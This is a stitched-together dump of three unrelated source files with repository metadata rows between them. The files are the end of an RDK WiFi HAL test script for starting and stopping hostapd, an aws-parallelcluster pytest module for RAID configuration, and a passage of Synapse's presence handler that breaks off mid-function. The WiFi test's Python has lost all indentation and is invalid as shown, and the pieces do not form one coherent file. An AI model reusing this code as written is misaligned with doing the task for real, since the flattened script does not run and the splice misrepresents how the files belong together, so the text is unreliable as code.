<!-- -->
<advanced_script>false</advanced_script>
<!-- execution_time is the time out time for test execution -->
<remarks></remarks>
<!-- Reason for skipping the tests if marked to skip -->
<skip>false</skip>
<!-- -->
<box_types>
<box_type>Broadband</box_type>
<!-- -->
<box_type>Emulator</box_type>
<!-- -->
<box_type>RPI</box_type>
<!-- -->
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
<!-- -->
</rdk_versions>
<test_cases>
<test_case_id>TC_WIFIHAL_284</test_case_id>
<test_objective>To start or stop Host Apd using wifi_startHostApd() and wifi_stopHostApd() and validate the same using wifi_getApStatus() api.</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband,Emulator,RPI</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state else invoke cosa_start.sh manually that includes all the ccsp components and TDK Component
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>wifi_startHostApd()
wifi_stopHostApd()
wifi_getApStatus()
wifi_getApEnable()
wifi_setApEnable()</api_or_interface_used>
<input_parameters>methodName : startHostApd
methodName : stopHostApd
methodName : getApStatus
methodName : getApEnable
methodName : setApEnable
radioIndex : 0
radioIndex : 1</input_parameters>
<automation_approch>1.Get the ApEnable value using wifi_getApEnable() for both 2.4GHz and 5GHz.
2.If the value is Enabled,get the Ap Status for both 2.4GHz and 5GHz using wifi_getApStatus() api.
3.If the value is not Enabled,set the ApEnable to Enabled using wifi_setApEnable() api and get the Ap Status for both 2.4GHz and 5GHz.
4.If the Ap status is 'Up' for either 2.4GHz or 5GHz, call the wifi_stopHostApd() api else call the wifi_startHostApd() api.
5.Get the Ap status and check whether the status is changed after calling wifi_startHostApd() or wifi_stopHostApd() api for both 2.4GHz and 5GHz.
6.If changed,return SUCCESS,else FAILURE.
7.Unload the module.</automation_approch>
<expected_output>Ap Status should change after invoking wifi_startHostApd() and wifi_stopHostApd() for both 2.4GHz and 5GHz.</expected_output>
<priority>High</priority>
<test_stub_interface>WIFIHAL</test_stub_interface>
<test_script>TS_WIFIHAL_StartOrStopHostApd</test_script>
<skipped>No</skipped>
<release_version></release_version>
<remarks></remarks>
</test_cases>
<script_tags />
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
import time;
from wifiUtility import *;
radio0 = "2.4G"
radio1 = "5G"
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("wifihal","1");
#IP and Port of box, no need to change;
#this will be replaced with the corresponding Box IP and port while executing the script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_WIFIHAL_StartOrStopHostApd');
#Get the result of connection with test component and DUT
loadmodulestatus =obj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus ;
def GetApStatus(radioIndex):
expectedresult="SUCCESS";
getMethod = "getApStatus"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method from wifiUtility to execute test case and set result status for the test.
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, radioIndex, "0", getMethod)
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
return (details.split(":")[1].strip());
else:
tdkTestObj.setResultStatus("FAILURE");
if "SUCCESS" in loadmodulestatus.upper():
obj.setLoadModuleStatus("SUCCESS");
tdkTestObjTemp, idx0 = getIndex(obj, radio0);
tdkTestObjTemp, idx1 = getIndex(obj, radio1);
    ## Check if an invalid index is returned
if idx0 == -1 or idx1 == -1:
if idx0 == -1 :
print "Failed to get radio index for radio %s\n" %radio0;
if idx1 == -1:
print "Failed to get radio index for radio %s\n" %radio1;
tdkTestObjTemp.setResultStatus("FAILURE");
else:
status0_initial = GetApStatus(idx0);
print"InitialApStatus for 2.4GHz = ",status0_initial;
status1_initial = GetApStatus(idx1);
print"InitialApStatus for 5GHz = ",status1_initial;
if status0_initial == 'Up' or status1_initial == 'Up':
print"********INVOKING wifi_stopHostApd() api********";
#Primitive test case which associated to this Script
tdkTestObj = obj.createTestStep('WIFIHAL_StartorStopHostApd');
#Giving the method name to invoke the api wifi_stopHostApd()
tdkTestObj.addParameter("methodName","stopHostApd");
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
time.sleep(5);
status0_final = GetApStatus(idx0);
status1_final = GetApStatus(idx1);
print"ApStatus for 2.4GHz after calling stopHostApd is ",status0_final;
print"ApStatus for 5GHz after calling stopHostApd is ",status1_final;
if status0_final == 'Disable' and status1_final == 'Disable':
tdkTestObj.setResultStatus("SUCCESS");
print"TEST STEP:To stop the HostApd using wifi_stopHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Disable' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is changed to 'Disable' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print"TEST STEP:To stop the HostApd using wifi_stopHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Disable' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is not changed to 'Disable' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print"StopHostApd() operation failed";
elif status0_initial == 'Disable' or status1_initial == 'Disable':
print"********INVOKING wifi_startHostApd() api********";
#Primitive test case which associated to this Script
tdkTestObj = obj.createTestStep('WIFIHAL_StartorStopHostApd');
#Giving the method name to invoke the api wifi_startHostApd()
tdkTestObj.addParameter("methodName","startHostApd");
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
time.sleep(5);
status0_final = GetApStatus(idx0);
status1_final = GetApStatus(idx1);
print"ApStatus for 2.4GHz after calling startHostApd is ",status0_final;
print"ApStatus for 5GHz after calling startHostApd is ",status1_final;
if status0_final == 'Up' and status1_final == 'Up':
tdkTestObj.setResultStatus("SUCCESS");
print"TEST STEP:To start the HostApd using wifi_startHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Up' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is changed to 'Up' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print"TEST STEP:To start the HostApd using wifi_startHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Up' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is not changed to 'Up' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print"StartHostApd() operation failed";
else:
print "wifi_getApStatus is returning invalid status";
tdkTestObj.setResultStatus("FAILURE");
obj.unloadModule("wifihal");
else:
print "Failed to load wifi module";
obj.setLoadModuleStatus("FAILURE");
| 50.643519
| 163
| 0.668617
|
0f56accaa660269e0141f7f93780696b44c86881
| 7,746
|
py
|
Python
|
cli/tests/pcluster/config/test_section_raid.py
|
gkao123/aws-parallelcluster
|
e46b91d5a6d8d8ba39e43188e19fdb7525313473
|
[
"Apache-2.0"
] | null | null | null |
cli/tests/pcluster/config/test_section_raid.py
|
gkao123/aws-parallelcluster
|
e46b91d5a6d8d8ba39e43188e19fdb7525313473
|
[
"Apache-2.0"
] | null | null | null |
cli/tests/pcluster/config/test_section_raid.py
|
gkao123/aws-parallelcluster
|
e46b91d5a6d8d8ba39e43188e19fdb7525313473
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import tests.pcluster.config.utils as utils
from pcluster.config.mappings import RAID
from tests.pcluster.config.defaults import DefaultCfnParams, DefaultDict
@pytest.mark.parametrize(
"cfn_params_dict, expected_section_dict",
[
(DefaultCfnParams["raid"].value, DefaultDict["raid"].value),
({}, DefaultDict["raid"].value),
({"RAIDOptions": "NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE"}, DefaultDict["raid"].value),
({"RAIDOptions": "NONE,NONE,NONE,NONE,NONE,NONE,NONE,NONE"}, DefaultDict["raid"].value),
(
{"RAIDOptions": "test,NONE,NONE,NONE,NONE,NONE,NONE,NONE"},
{
"shared_dir": "test",
"raid_type": None,
"num_of_raid_volumes": 2,
"volume_type": "gp2",
"volume_size": 20,
"volume_iops": 100,
"encrypted": False,
"ebs_kms_key_id": None,
},
),
(
{"RAIDOptions": "test,0,3,gp2,30,200,true,test"},
{
"shared_dir": "test",
"raid_type": 0,
"num_of_raid_volumes": 3,
"volume_type": "gp2",
"volume_size": 30,
"volume_iops": 200,
"encrypted": True,
"ebs_kms_key_id": "test",
},
),
],
)
def test_raid_section_from_cfn(mocker, cfn_params_dict, expected_section_dict):
utils.assert_section_from_cfn(mocker, RAID, cfn_params_dict, expected_section_dict)
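# --- Illustrative sketch (not part of the original test module) ---
# The parametrized cases above imply that the "RAIDOptions" CFN parameter is a
# comma-separated list whose positions map onto the raid section fields in the
# order below. A tiny helper, for illustration only, that makes that mapping
# explicit (real parsing and validation live in pcluster.config, not here):
def example_split_raid_options(raid_options: str) -> dict:
    keys = [
        "shared_dir", "raid_type", "num_of_raid_volumes", "volume_type",
        "volume_size", "volume_iops", "encrypted", "ebs_kms_key_id",
    ]
    values = [v.strip() for v in raid_options.split(",")]
    return dict(zip(keys, values))
# e.g. example_split_raid_options("test,0,3,gp2,30,200,true,test")["volume_size"] == "30"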
@pytest.mark.parametrize(
"config_parser_dict, expected_dict_params, expected_message",
[
# default
({"raid default": {}}, {}, None),
# right value
({"raid default": {"raid_type": 1}}, {"raid_type": 1}, None),
({"raid default": {"volume_type": "gp2"}}, {"volume_type": "gp2"}, None),
# invalid value
({"raid default": {"raid_type": "wrong_value"}}, None, "must be an Integer"),
({"raid default": {"volume_type": "wrong_value"}}, None, "invalid value"),
# invalid key
({"raid default": {"invalid_key": "fake_value"}}, None, "'invalid_key' is not allowed in the .* section"),
],
)
def test_raid_section_from_file(mocker, config_parser_dict, expected_dict_params, expected_message):
utils.assert_section_from_file(mocker, RAID, config_parser_dict, expected_dict_params, expected_message)
@pytest.mark.parametrize(
"section_dict, expected_config_parser_dict, expected_message",
[
# default
({}, {"raid default": {}}, None),
# default values
({"volume_iops": 100}, {"raid default": {"volume_iops": "100"}}, "No section.*"),
({"encrypted": False}, {"raid default": {"encrypted": "false"}}, "No section.*"),
# other values
({"volume_iops": 120}, {"raid default": {"volume_iops": "120"}}, None),
({"encrypted": True}, {"raid default": {"encrypted": "true"}}, None),
],
)
def test_raid_section_to_file(mocker, section_dict, expected_config_parser_dict, expected_message):
utils.assert_section_to_file(mocker, RAID, section_dict, expected_config_parser_dict, expected_message)
@pytest.mark.parametrize(
"section_dict, expected_cfn_params", [(DefaultDict["raid"].value, DefaultCfnParams["raid"].value)]
)
def test_raid_section_to_cfn(mocker, section_dict, expected_cfn_params):
utils.assert_section_to_cfn(mocker, RAID, section_dict, expected_cfn_params)
@pytest.mark.parametrize(
"param_key, param_value, expected_value, expected_message",
[
("shared_dir", None, None, None),
("shared_dir", "", None, "Allowed values are"),
("shared_dir", "fake_value", "fake_value", None),
("shared_dir", "/test", "/test", None),
("shared_dir", "/test/test2", "/test/test2", None),
("shared_dir", "/t_ 1-2( ):&;<>t?*+|", "/t_ 1-2( ):&;<>t?*+|", None),
("shared_dir", "//test", None, "has an invalid value"),
("shared_dir", "./test", None, "has an invalid value"),
("shared_dir", "\\test", None, "has an invalid value"),
("shared_dir", ".test", None, "has an invalid value"),
("shared_dir", "/test/.test2", None, "has an invalid value"),
("shared_dir", "/test/.test2/test3", None, "has an invalid value"),
("shared_dir", "/test//test2", None, "has an invalid value"),
("shared_dir", "/test\\test2", None, "has an invalid value"),
("shared_dir", "NONE", "NONE", None), # NONE is evaluated as a valid path
("raid_type", None, None, None),
("raid_type", "", None, "must be an Integer"),
("raid_type", "NONE", None, "must be an Integer"),
("raid_type", "wrong_value", None, "must be an Integer"),
("raid_type", "10", None, "invalid value"),
("raid_type", "3", None, "invalid value"),
("raid_type", "0", 0, None),
("raid_type", "1", 1, None),
("num_of_raid_volumes", None, 2, None),
("num_of_raid_volumes", "", None, "must be an Integer"),
("num_of_raid_volumes", "NONE", None, "must be an Integer"),
("num_of_raid_volumes", "wrong_value", None, "must be an Integer"),
("num_of_raid_volumes", "0", None, "invalid value"),
("num_of_raid_volumes", "1", None, "invalid value"),
("num_of_raid_volumes", "6", None, "invalid value"),
("num_of_raid_volumes", "5", 5, None),
("num_of_raid_volumes", "2", 2, None),
("volume_type", None, "gp2", None),
("volume_type", "", None, "Allowed values are"),
("volume_type", "wrong_value", None, "Allowed values are"),
("volume_type", "io1", "io1", None),
("volume_type", "standard", "standard", None),
("volume_type", "NONE", None, "Allowed values are"),
("volume_size", None, 20, None),
("volume_size", "", None, "must be an Integer"),
("volume_size", "NONE", None, "must be an Integer"),
("volume_size", "wrong_value", None, "must be an Integer"),
("volume_size", "10", 10, None),
("volume_size", "3", 3, None),
("volume_iops", None, 100, None),
("volume_iops", "", None, "must be an Integer"),
("volume_iops", "NONE", None, "must be an Integer"),
("volume_iops", "wrong_value", None, "must be an Integer"),
("volume_iops", "10", 10, None),
("volume_iops", "3", 3, None),
("encrypted", None, False, None),
("encrypted", "", None, "must be a Boolean"),
("encrypted", "NONE", None, "must be a Boolean"),
("encrypted", "true", True, None),
("encrypted", "false", False, None),
("ebs_kms_key_id", None, None, None),
("ebs_kms_key_id", "", "", None),
("ebs_kms_key_id", "fake_value", "fake_value", None),
("ebs_kms_key_id", "test", "test", None),
("ebs_kms_key_id", "NONE", "NONE", None), # NONE is evaluated as a valid kms id
],
)
def test_raid_param_from_file(mocker, param_key, param_value, expected_value, expected_message):
utils.assert_param_from_file(mocker, RAID, param_key, param_value, expected_value, expected_message)
| 46.383234
| 119
| 0.596179
|
c781fefb1bc780b142909aaa30ed9c1e25a3b26f
| 89,039
|
py
|
Python
|
synapse/handlers/presence.py
|
dsonck92/synapse
|
2560b1b6b2f74b5724253396c0e3665fa1f7968c
|
[
"Apache-2.0"
] | 1
|
2022-01-14T05:37:16.000Z
|
2022-01-14T05:37:16.000Z
|
synapse/handlers/presence.py
|
dsonck92/synapse
|
2560b1b6b2f74b5724253396c0e3665fa1f7968c
|
[
"Apache-2.0"
] | null | null | null |
synapse/handlers/presence.py
|
dsonck92/synapse
|
2560b1b6b2f74b5724253396c0e3665fa1f7968c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is responsible for keeping track of presence status of local
and remote users.
The methods that define policy are:
- PresenceHandler._update_states
- PresenceHandler._handle_timeouts
- should_notify
"""
import abc
import contextlib
import logging
from bisect import bisect
from contextlib import contextmanager
from types import TracebackType
from typing import (
TYPE_CHECKING,
Any,
Awaitable,
Callable,
Collection,
Dict,
FrozenSet,
Generator,
Iterable,
List,
Optional,
Set,
Tuple,
Type,
Union,
)
from prometheus_client import Counter
from typing_extensions import ContextManager
import synapse.metrics
from synapse.api.constants import EventTypes, Membership, PresenceState
from synapse.api.errors import SynapseError
from synapse.api.presence import UserPresenceState
from synapse.appservice import ApplicationService
from synapse.events.presence_router import PresenceRouter
from synapse.logging.context import run_in_background
from synapse.logging.utils import log_function
from synapse.metrics import LaterGauge
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.presence import (
ReplicationBumpPresenceActiveTime,
ReplicationPresenceSetState,
)
from synapse.replication.http.streams import ReplicationGetStreamUpdates
from synapse.replication.tcp.commands import ClearUserSyncsCommand
from synapse.replication.tcp.streams import PresenceFederationStream, PresenceStream
from synapse.storage.databases.main import DataStore
from synapse.streams import EventSource
from synapse.types import JsonDict, UserID, get_domain_from_id
from synapse.util.async_helpers import Linearizer
from synapse.util.caches.descriptors import _CacheContext, cached
from synapse.util.metrics import Measure
from synapse.util.wheel_timer import WheelTimer
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
notified_presence_counter = Counter("synapse_handler_presence_notified_presence", "")
federation_presence_out_counter = Counter(
"synapse_handler_presence_federation_presence_out", ""
)
presence_updates_counter = Counter("synapse_handler_presence_presence_updates", "")
timers_fired_counter = Counter("synapse_handler_presence_timers_fired", "")
federation_presence_counter = Counter(
"synapse_handler_presence_federation_presence", ""
)
bump_active_time_counter = Counter("synapse_handler_presence_bump_active_time", "")
get_updates_counter = Counter("synapse_handler_presence_get_updates", "", ["type"])
notify_reason_counter = Counter(
"synapse_handler_presence_notify_reason", "", ["reason"]
)
state_transition_counter = Counter(
"synapse_handler_presence_state_transition", "", ["from", "to"]
)
# If a user was last active in the last LAST_ACTIVE_GRANULARITY, consider them
# "currently_active"
LAST_ACTIVE_GRANULARITY = 60 * 1000
# How long to wait until a new /events or /sync request before assuming
# the client has gone.
SYNC_ONLINE_TIMEOUT = 30 * 1000
# How long to wait before marking the user as idle. Compared against last active
IDLE_TIMER = 5 * 60 * 1000
# How often we expect remote servers to resend us presence.
FEDERATION_TIMEOUT = 30 * 60 * 1000
# How often to resend presence to remote servers
FEDERATION_PING_INTERVAL = 25 * 60 * 1000
# How long we will wait before assuming that the syncs from an external process
# are dead.
EXTERNAL_PROCESS_EXPIRY = 5 * 60 * 1000
# Delay before a worker tells the presence handler that a user has stopped
# syncing.
UPDATE_SYNCING_USERS_MS = 10 * 1000
assert LAST_ACTIVE_GRANULARITY < IDLE_TIMER
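# --- Illustrative sketch (not part of the original module) ---
# A hedged, standalone illustration of how the two activity thresholds above
# relate: a user active within LAST_ACTIVE_GRANULARITY is treated as
# "currently_active", and one inactive for longer than IDLE_TIMER is a
# candidate for being marked idle. This mirrors the comments above only; the
# real transitions are implemented in handle_update()/handle_timeouts().
def _example_activity_bucket(last_active_ts: int, now: int) -> str:
    inactive_for = now - last_active_ts
    if inactive_for < LAST_ACTIVE_GRANULARITY:
        return "currently_active"
    if inactive_for > IDLE_TIMER:
        return "idle_candidate"
    return "online_but_not_recently_active"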
class BasePresenceHandler(abc.ABC):
"""Parts of the PresenceHandler that are shared between workers and presence
writer"""
def __init__(self, hs: "HomeServer"):
self.clock = hs.get_clock()
self.store = hs.get_datastore()
self.presence_router = hs.get_presence_router()
self.state = hs.get_state_handler()
self.is_mine_id = hs.is_mine_id
self._federation = None
if hs.should_send_federation():
self._federation = hs.get_federation_sender()
self._federation_queue = PresenceFederationQueue(hs, self)
self._busy_presence_enabled = hs.config.experimental.msc3026_enabled
active_presence = self.store.take_presence_startup_info()
self.user_to_current_state = {state.user_id: state for state in active_presence}
@abc.abstractmethod
async def user_syncing(
self, user_id: str, affect_presence: bool
) -> ContextManager[None]:
"""Returns a context manager that should surround any stream requests
from the user.
This allows us to keep track of who is currently streaming and who isn't
without having to have timers outside of this module to avoid flickering
when users disconnect/reconnect.
Args:
user_id: the user that is starting a sync
affect_presence: If false this function will be a no-op.
Useful for streams that are not associated with an actual
client that is being used by a user.
"""
@abc.abstractmethod
def get_currently_syncing_users_for_replication(self) -> Iterable[str]:
"""Get an iterable of syncing users on this worker, to send to the presence handler
This is called when a replication connection is established. It should return
a list of user ids, which are then sent as USER_SYNC commands to inform the
process handling presence about those users.
Returns:
An iterable of user_id strings.
"""
async def get_state(self, target_user: UserID) -> UserPresenceState:
results = await self.get_states([target_user.to_string()])
return results[0]
async def get_states(
self, target_user_ids: Iterable[str]
) -> List[UserPresenceState]:
"""Get the presence state for users."""
updates_d = await self.current_state_for_users(target_user_ids)
updates = list(updates_d.values())
for user_id in set(target_user_ids) - {u.user_id for u in updates}:
updates.append(UserPresenceState.default(user_id))
return updates
async def current_state_for_users(
self, user_ids: Iterable[str]
) -> Dict[str, UserPresenceState]:
"""Get the current presence state for multiple users.
Returns:
dict: `user_id` -> `UserPresenceState`
"""
states = {
user_id: self.user_to_current_state.get(user_id, None)
for user_id in user_ids
}
missing = [user_id for user_id, state in states.items() if not state]
if missing:
# There are things not in our in memory cache. Lets pull them out of
# the database.
res = await self.store.get_presence_for_users(missing)
states.update(res)
missing = [user_id for user_id, state in states.items() if not state]
if missing:
new = {
user_id: UserPresenceState.default(user_id) for user_id in missing
}
states.update(new)
self.user_to_current_state.update(new)
return states
@abc.abstractmethod
async def set_state(
self,
target_user: UserID,
state: JsonDict,
ignore_status_msg: bool = False,
force_notify: bool = False,
) -> None:
"""Set the presence state of the user.
Args:
target_user: The ID of the user to set the presence state of.
state: The presence state as a JSON dictionary.
ignore_status_msg: True to ignore the "status_msg" field of the `state` dict.
If False, the user's current status will be updated.
force_notify: Whether to force notification of the update to clients.
"""
@abc.abstractmethod
async def bump_presence_active_time(self, user: UserID) -> None:
"""We've seen the user do something that indicates they're interacting
with the app.
"""
async def update_external_syncs_row(
self, process_id: str, user_id: str, is_syncing: bool, sync_time_msec: int
) -> None:
"""Update the syncing users for an external process as a delta.
This is a no-op when presence is handled by a different worker.
Args:
process_id: An identifier for the process the users are
syncing against. This allows synapse to process updates
as user start and stop syncing against a given process.
user_id: The user who has started or stopped syncing
is_syncing: Whether or not the user is now syncing
sync_time_msec: Time in ms when the user was last syncing
"""
pass
async def update_external_syncs_clear(self, process_id: str) -> None:
"""Marks all users that had been marked as syncing by a given process
as offline.
Used when the process has stopped/disappeared.
This is a no-op when presence is handled by a different worker.
"""
pass
async def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: list
) -> None:
"""Process streams received over replication."""
await self._federation_queue.process_replication_rows(
stream_name, instance_name, token, rows
)
def get_federation_queue(self) -> "PresenceFederationQueue":
"""Get the presence federation queue."""
return self._federation_queue
async def maybe_send_presence_to_interested_destinations(
self, states: List[UserPresenceState]
) -> None:
"""If this instance is a federation sender, send the states to all
destinations that are interested. Filters out any states for remote
users.
"""
if not self._federation:
return
states = [s for s in states if self.is_mine_id(s.user_id)]
if not states:
return
hosts_to_states = await get_interested_remotes(
self.store,
self.presence_router,
states,
)
for destination, host_states in hosts_to_states.items():
self._federation.send_presence_to_destinations(host_states, [destination])
async def send_full_presence_to_users(self, user_ids: Collection[str]) -> None:
"""
Adds to the list of users who should receive a full snapshot of presence
upon their next sync. Note that this only works for local users.
Then, grabs the current presence state for a given set of users and adds it
to the top of the presence stream.
Args:
user_ids: The IDs of the local users to send full presence to.
"""
# Retrieve one of the users from the given set
if not user_ids:
raise Exception(
"send_full_presence_to_users must be called with at least one user"
)
user_id = next(iter(user_ids))
# Mark all users as receiving full presence on their next sync
await self.store.add_users_to_send_full_presence_to(user_ids)
# Add a new entry to the presence stream. Since we use stream tokens to determine whether a
# local user should receive a full snapshot of presence when they sync, we need to bump the
# presence stream so that subsequent syncs with no presence activity in between won't result
# in the client receiving multiple full snapshots of presence.
#
# If we bump the stream ID, then the user will get a higher stream token next sync, and thus
# correctly won't receive a second snapshot.
# Get the current presence state for one of the users (defaults to offline if not found)
current_presence_state = await self.get_state(UserID.from_string(user_id))
# Convert the UserPresenceState object into a serializable dict
state = {
"presence": current_presence_state.state,
"status_message": current_presence_state.status_msg,
}
# Copy the presence state to the tip of the presence stream.
# We set force_notify=True here so that this presence update is guaranteed to
# increment the presence stream ID (which resending the current user's presence
# otherwise would not do).
await self.set_state(UserID.from_string(user_id), state, force_notify=True)
async def is_visible(self, observed_user: UserID, observer_user: UserID) -> bool:
raise NotImplementedError(
"Attempting to check presence on a non-presence worker."
)
class _NullContextManager(ContextManager[None]):
"""A context manager which does nothing."""
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> None:
pass
class WorkerPresenceHandler(BasePresenceHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.hs = hs
self._presence_writer_instance = hs.config.worker.writers.presence[0]
self._presence_enabled = hs.config.server.use_presence
# Route presence EDUs to the right worker
hs.get_federation_registry().register_instances_for_edu(
"m.presence",
hs.config.worker.writers.presence,
)
# The number of ongoing syncs on this process, by user id.
# Empty if _presence_enabled is false.
self._user_to_num_current_syncs: Dict[str, int] = {}
self.notifier = hs.get_notifier()
self.instance_id = hs.get_instance_id()
# user_id -> last_sync_ms. Lists the users that have stopped syncing but
# we haven't notified the presence writer of that yet
self.users_going_offline: Dict[str, int] = {}
self._bump_active_client = ReplicationBumpPresenceActiveTime.make_client(hs)
self._set_state_client = ReplicationPresenceSetState.make_client(hs)
self._send_stop_syncing_loop = self.clock.looping_call(
self.send_stop_syncing, UPDATE_SYNCING_USERS_MS
)
self._busy_presence_enabled = hs.config.experimental.msc3026_enabled
hs.get_reactor().addSystemEventTrigger(
"before",
"shutdown",
run_as_background_process,
"generic_presence.on_shutdown",
self._on_shutdown,
)
async def _on_shutdown(self) -> None:
if self._presence_enabled:
self.hs.get_tcp_replication().send_command(
ClearUserSyncsCommand(self.instance_id)
)
def send_user_sync(self, user_id: str, is_syncing: bool, last_sync_ms: int) -> None:
if self._presence_enabled:
self.hs.get_tcp_replication().send_user_sync(
self.instance_id, user_id, is_syncing, last_sync_ms
)
def mark_as_coming_online(self, user_id: str) -> None:
"""A user has started syncing. Send a UserSync to the presence writer,
unless they had recently stopped syncing.
"""
going_offline = self.users_going_offline.pop(user_id, None)
if not going_offline:
# Safe to skip because we haven't yet told the presence writer they
# were offline
self.send_user_sync(user_id, True, self.clock.time_msec())
def mark_as_going_offline(self, user_id: str) -> None:
"""A user has stopped syncing. We wait before notifying the presence
        writer as it's likely they'll come back soon. This allows us to avoid
sending a stopped syncing immediately followed by a started syncing
notification to the presence writer
"""
self.users_going_offline[user_id] = self.clock.time_msec()
def send_stop_syncing(self) -> None:
"""Check if there are any users who have stopped syncing a while ago and
haven't come back yet. If there are poke the presence writer about them.
"""
now = self.clock.time_msec()
for user_id, last_sync_ms in list(self.users_going_offline.items()):
if now - last_sync_ms > UPDATE_SYNCING_USERS_MS:
self.users_going_offline.pop(user_id, None)
self.send_user_sync(user_id, False, last_sync_ms)
async def user_syncing(
self, user_id: str, affect_presence: bool
) -> ContextManager[None]:
"""Record that a user is syncing.
Called by the sync and events servlets to record that a user has connected to
this worker and is waiting for some events.
"""
if not affect_presence or not self._presence_enabled:
return _NullContextManager()
curr_sync = self._user_to_num_current_syncs.get(user_id, 0)
self._user_to_num_current_syncs[user_id] = curr_sync + 1
# If we went from no in flight sync to some, notify replication
if self._user_to_num_current_syncs[user_id] == 1:
self.mark_as_coming_online(user_id)
def _end() -> None:
# We check that the user_id is in user_to_num_current_syncs because
# user_to_num_current_syncs may have been cleared if we are
# shutting down.
if user_id in self._user_to_num_current_syncs:
self._user_to_num_current_syncs[user_id] -= 1
                # If we went from one in flight sync to none, notify replication
if self._user_to_num_current_syncs[user_id] == 0:
self.mark_as_going_offline(user_id)
@contextlib.contextmanager
def _user_syncing() -> Generator[None, None, None]:
try:
yield
finally:
_end()
return _user_syncing()
async def notify_from_replication(
self, states: List[UserPresenceState], stream_id: int
) -> None:
parties = await get_interested_parties(self.store, self.presence_router, states)
room_ids_to_states, users_to_states = parties
self.notifier.on_new_event(
"presence_key",
stream_id,
rooms=room_ids_to_states.keys(),
users=users_to_states.keys(),
)
async def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: list
) -> None:
await super().process_replication_rows(stream_name, instance_name, token, rows)
if stream_name != PresenceStream.NAME:
return
states = [
UserPresenceState(
row.user_id,
row.state,
row.last_active_ts,
row.last_federation_update_ts,
row.last_user_sync_ts,
row.status_msg,
row.currently_active,
)
for row in rows
]
# The list of states to notify sync streams and remote servers about.
# This is calculated by comparing the old and new states for each user
# using `should_notify(..)`.
#
# Note that this is necessary as the presence writer will periodically
# flush presence state changes that should not be notified about to the
# DB, and so will be sent over the replication stream.
state_to_notify = []
for new_state in states:
old_state = self.user_to_current_state.get(new_state.user_id)
self.user_to_current_state[new_state.user_id] = new_state
if not old_state or should_notify(old_state, new_state):
state_to_notify.append(new_state)
stream_id = token
await self.notify_from_replication(state_to_notify, stream_id)
# If this is a federation sender, notify about presence updates.
await self.maybe_send_presence_to_interested_destinations(state_to_notify)
def get_currently_syncing_users_for_replication(self) -> Iterable[str]:
return [
user_id
for user_id, count in self._user_to_num_current_syncs.items()
if count > 0
]
async def set_state(
self,
target_user: UserID,
state: JsonDict,
ignore_status_msg: bool = False,
force_notify: bool = False,
) -> None:
"""Set the presence state of the user.
Args:
target_user: The ID of the user to set the presence state of.
state: The presence state as a JSON dictionary.
ignore_status_msg: True to ignore the "status_msg" field of the `state` dict.
If False, the user's current status will be updated.
force_notify: Whether to force notification of the update to clients.
"""
presence = state["presence"]
valid_presence = (
PresenceState.ONLINE,
PresenceState.UNAVAILABLE,
PresenceState.OFFLINE,
PresenceState.BUSY,
)
